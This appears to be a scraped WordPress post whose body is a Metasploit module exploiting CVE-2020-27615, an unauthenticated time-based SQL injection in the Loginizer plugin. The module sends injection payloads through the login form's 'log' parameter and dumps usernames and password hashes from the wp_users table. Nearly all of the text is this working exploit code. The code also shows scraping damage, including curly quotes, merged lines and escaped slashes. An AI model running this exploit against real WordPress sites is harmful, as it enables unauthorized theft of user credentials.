##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
include Msf::Exploit::SQLi<\/p>\n
def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘WordPress Loginizer log SQLi Scanner’,
‘Description’ => %q{
Loginizer wordpress plugin contains an unauthenticated timebased SQL injection in
versions before 1.6.4. The vulnerable parameter is in the log parameter.
Wordpress has forced updates of the plugin to all servers
},
‘Author’ => [
‘h00die’, # msf module
‘red0xff’, # sqli help
‘mslavco’ # discovery
],
‘License’ => MSF_LICENSE,
‘References’ => [
[‘URL’, ‘https:\/\/wpdeeply.com\/loginizer-before-1-6-4-sqli-injection\/’],
[‘CVE’, ‘2020-27615’],
[‘URL’, ‘https:\/\/loginizer.com\/blog\/loginizer-1-6-4-security-fix\/’],
[‘URL’, ‘https:\/\/twitter.com\/mslavco\/status\/1318877097184604161’]],
‘Actions’ => [
[‘List Users’, { ‘Description’ => ‘Queries username, password hash for COUNT users’ }],
],
‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘Reliability’ => [],
‘SideEffects’ => [IOC_IN_LOGS]},
‘DefaultAction’ => ‘List Users’,
‘DisclosureDate’ => ‘2020-10-21’
)
)
register_options [
OptInt.new(‘COUNT’, [false, ‘Number of users to enumerate’, 1])
]end<\/p>\n
def run_host(ip)
unless wordpress_and_online?
vprint_error(‘Server not online or not detected as wordpress’)
return
end<\/p>\n
wp_ver = wordpress_version
if wp_ver.nil?
vprint_error(‘Unable to determine wordpress version, check settings.’)
return
end<\/p>\n
if Rex::Version.new(wp_ver) < Rex::Version.new(‘5.4’)
vprint_error(“Wordpress (core) #{wp_ver} is unexploitable. Version 5.4+ required.”)
return
end<\/p>\n
checkcode = check_plugin_version_from_readme(‘loginizer’, ‘1.6.4’)
if checkcode == Msf::Exploit::CheckCode::Safe
vprint_error(‘Loginizer version not vulnerable’)
return
else
print_good(‘Vulnerable version of Loginizer detected’)
end<\/p>\n
cookie = send_request_cgi({
‘method’ => ‘GET’,
‘uri’ => normalize_uri(target_uri.path, ‘wp-login.php’)
})
if cookie.nil?
print_error(‘Unable to retrieve wordpress cookie, check settings.’)
return
end
cookie = cookie.get_cookies
password = Rex::Text.rand_text_alpha(10)<\/p>\n
@sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
if payload.include?(‘<‘)
payload.gsub!(\/<>\/, ‘=’)
payload.gsub!(\/(sleep\\(\\d+\\.?\\d*\\)),0\/) { “0,#{Regexp.last_match(1)}” }
end
res = send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘wp-login.php’),
‘cookie’ => cookie,
‘vars_post’ => {
‘log’ => “‘,ip=LEFT(UUID(),8),url=#{payload}#”,
‘pwd’ => password,
‘wp-submit’ => ‘Login’,
‘redirect_to’ => ”,
‘testcookie’ => ‘1’
}
})
fail_with Failure::Unreachable, ‘Connection failed’ unless res
end
unless @sqli.test_vulnerable
print_bad(“#{peer} – Testing of SQLi failed. If this is time based, try increasing SqliDelay.”)
return
end<\/p>\n
columns = [‘user_login’, ‘user_pass’]results = @sqli.dump_table_fields(‘wp_users’, columns, ”, datastore[‘COUNT’])
table = Rex::Text::Table.new(‘Header’ => ‘wp_users’, ‘Indent’ => 1, ‘Columns’ => columns)
results.each do |user|
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: user[0],
private_type: :nonreplayable_hash,
jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]),
private_data: user[1],
service_name: ‘Wordpress’,
address: ip,
port: datastore[‘RPORT’],
protocol: ‘tcp’,
status: Metasploit::Model::Login::Status::UNTRIED
})
table << user
end
print_good(table.to_s)
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HTTP::Wordpressinclude Msf::Auxiliary::Scannerinclude Msf::Exploit::SQLi def initialize(info = {})super(update_info(info,‘Name’ => ‘WordPress Loginizer log SQLi Scanner’,‘Description’ => %q{Loginizer wordpress plugin contains an unauthenticated timebased SQL injection inversions before 1.6.4. The vulnerable parameter is in the log parameter.Wordpress has forced updates of the plugin to all …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59348","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59348","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59348"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59348\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59348"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59348"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}